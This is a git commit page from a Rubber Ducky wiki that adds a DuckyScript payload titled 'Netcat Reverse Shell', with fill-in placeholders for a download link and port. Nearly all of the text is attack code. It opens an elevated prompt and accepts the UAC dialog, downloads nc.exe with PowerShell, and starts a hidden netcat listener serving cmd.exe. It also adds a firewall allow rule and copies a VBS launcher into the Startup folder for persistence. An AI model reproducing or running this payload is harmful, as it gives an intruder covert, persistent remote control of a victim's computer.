Robot
/
wiki-rubber-ducky-usb
2
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Created Payload Netcat Reverse Shell (markdown)

This commit is contained in:
Arion 2016-12-17 13:36:23 +05:30
parent 4d009a6f37
commit 8bb221a3db
1 changed files with 82 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

82
Payload-Netcat-Reverse-Shell.md Normal file
View File

@ -0,0 +1,82 @@
### **Change the following details**:
* **[NETCAT_DOWNLOAD_LINK]**: Your Netcat download link.
* **[PORT]**: The port on the target machine you want netcat to listen on.
* **Directory**: Use something other than %TEMP% if you want to.
## **CODE**:
```
REM Title: Netcat Reverse Shell
REM Author: Kanishk Singh
REM Version: 1
REM Description:
DELAY 200
REM --> Minimize all windows
WINDOWS d
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT y
DELAY 500
STRING cd %TEMP%
ENTER
REM --> Kills already running Netcat instance (if any)
STRING TASKKILL /im nc.exe /f
ENTER
REM --> Delete nc.exe file if it already exists
STRING erase /Q nc.exe
ENTER
REM --> Delete Start batch file if it already exists
STRING erase /Q Start.bat
ENTER
REM --> Delete Invisible.vbs in temp folder, if it already exists
STRING erase /Q invisible.vbs
ENTER
REM --> Delete invisible.vbs file in Startup if it already exists
STRING erase /Q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\invisible.vbs"
ENTER
DELAY 500
REM --> Downloads NetCat
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://[NETCAT_DOWNLOAD_LINK]/nc.exe','nc.exe')
ENTER
DELAY 500
REM --> Creates a batch file to start listening
STRING copy con Start.bat
ENTER
STRING nc -lp [PORT] -vv -e cmd.exe -L
ENTER
CONTROL z
ENTER
REM --> Starts batch file invisibly
STRING copy con invisible.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell" )
ENTER
STRING WshShell.Run chr(34) & "%TEMP%\Start.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
ENTER
CONTROL z
ENTER
REM --> Add netcat to allowed programs list, enabling it to communicate through the firewall seamlessly
STRING netsh advfirewall firewall add rule name="Netcat" dir=in action=allow program="%TEMP%\nc.exe" enable=yes
ENTER
STRING start invisible.vbs
ENTER
DELAY 100
REM --> Copies invisible.vbs to startup folder for persistence
STRING copy "invisible.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
ENTER
REM --> Kills CMD while nc.exe continues running in background, remove Ducky after CMD closes
STRING exit
ENTER
```
## **To-Do**:
* Test whether the script executes at startup.